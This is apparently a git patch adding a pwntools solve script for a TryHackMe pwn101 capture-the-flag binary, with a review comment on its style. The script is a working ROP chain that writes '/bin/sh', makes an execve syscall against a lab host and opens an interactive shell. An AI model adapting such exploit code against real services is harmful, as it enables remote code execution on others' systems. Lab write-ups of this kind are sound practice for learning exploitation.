From 4f91b8d5f8f5b9e72a5802055c0e5e455878dc51 Mon Sep 17 00:00:00 2001
From: jc
Date: Tue, 29 Oct 2024 20:31:07 +0300
Subject: [PATCH] solve script

---
 thm_pwn101/pwn110/a.py | 36 ++++++++++++++++++++++++++++++++++++
 1 file changed, 36 insertions(+)
 create mode 100644 thm_pwn101/pwn110/a.py

diff --git a/thm_pwn101/pwn110/a.py b/thm_pwn101/pwn110/a.py
new file mode 100644
index 0000000..973c3e1
--- /dev/null
+++ b/thm_pwn101/pwn110/a.py
@@ -0,0 +1,36 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./pwn110", checksec=False)
+# r = process()
+r = remote("10.10.42.182", 9010)
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# gadgets
+mov_q_ptr_rsi_rdi = 0x44629f
+syscall = 0x4173d4
+pop_rdi = 0x40191a
+pop_rsi = 0x40f4de
+pop_rax = 0x4497d7
+pop_rdx = 0x40181f
+
+# buf
+buf = b"A"*40
+buf += p64(pop_rdi)
+buf += p64(0x4c3500)
+buf += p64(pop_rsi)
+buf += b"/bin/sh\0"
+buf += p64(mov_q_ptr_rsi_rdi)
+buf += p64(pop_rax)
+buf += p64(59)
+buf += p64(pop_rsi)
+buf += p64(0)
+buf += p64(pop_rdx)
+buf += p64(0)
+buf += p64(syscall)
+s(buf)
+
+r.interactive()
\ No newline at end of file
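Review bot: `target` on the `context.binary = target = ELF("./pwn110", checksec=False)` line is never read afterwards, and `s = lambda a: r.sendline(a)` is the assigned-lambda form PEP 8 (E731) discourages; `context.binary = ELF("./pwn110", checksec=False)` together with a direct `r.sendline(buf)` expresses the same thing with fewer names. The variable name `mov_q_ptr_rsi_rdi` leaves the operand order ambiguous: the chain pops the writable address into rdi and the string into rsi, which only works if the gadget is a `mov qword ptr [rdi], rsi`, so a comment such as `# mov qword ptr [rdi], rsi -- operand order per disassembly, confirm` next to the assignment would keep the chain readable. The hard-coded addresses and the lab host in `remote(...)` are specific to this build and session, which is worth stating in a header comment so the script is not mistaken for something reusable.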